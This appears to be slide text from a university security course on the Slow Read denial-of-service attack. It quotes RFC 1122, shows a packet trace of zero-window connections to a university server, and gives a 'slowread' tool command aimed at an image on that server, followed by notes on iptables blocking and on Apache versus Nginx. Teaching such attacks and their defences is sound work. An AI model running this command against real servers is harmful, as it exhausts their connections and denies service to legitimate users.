FACULTY OF ENGINEERING AT UNIVERSITY OF PORTO
COMPUTER SYSTEMS SECURITY
Exhaust server connections
Require low amount of resources and bandwidth
”A TCP MAY keep its offered receive window closed indefinitely. As long as the receiving TCP continues to send acknowledgements in response to the probe segments, the sending TCP MUST allow the connection to stay open.”
- RFC 1122
16:57:44 attacker > ni.fe.up.pt: Flags [S], seq 3187993640, win 29200, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [S], seq 3930293194, win 1152, length 0
16:57:44 ni.fe.up.pt > attacker: Flags [S.], seq 4063001143, ack 3187993641, win 28960, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [.], ack 1, win 229, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [P.], seq 1:177, ack 1, win 229, length 176
16:57:44 ni.fe.up.pt > attacker: Flags [S.], seq 3470787838, ack 3930293195, win 28960, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [.], ack 1, win 1152, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [P.], seq 1:177, ack 1, win 1152, length 176
16:57:44 ni.fe.up.pt > attacker: Flags [.], ack 177, win 235, length 0
16:57:44 attacker > ni.fe.up.pt: Flags [.], ack 4526, win 0, length 0
16:57:45 ni.fe.up.pt > attacker: Flags [.], ack 528, win 243, length 0
16:57:45 attacker > ni.fe.up.pt: Flags [.], ack 4526, win 0, length 0
16:57:45 ni.fe.up.pt > attacker: Flags [.], ack 528, win 243, length 0
16:57:45 attacker > ni.fe.up.pt: Flags [.], ack 4526, win 0, length 0
16:57:46 ni.fe.up.pt > attacker: Flags [.], ack 528, win 243, length 0
Uses HTTP protocol as a mean
Practically no new requests
Probably, max thread-pool error
And use something to block:
iptables
route
ip
$ ./slowread -a https://ni.fe.up.pt/images/projects/PKyl13EDPj3HLxF4.png
https://github.com/bernardobelchior/slowread-rs
Overall protections
Particular protections
Apache
Nginx
In terms of handling connections, Apache has a maximum number of simultaneous connections that it can handle at the same time, while Nginx don't have a maximum connections, but instead, uses a scalable event-driven architecture to manage them. Apache receives requests and handles them by it self and Nginx instead, ignore those and let them run in the background, needing only to process connections with some logic associated.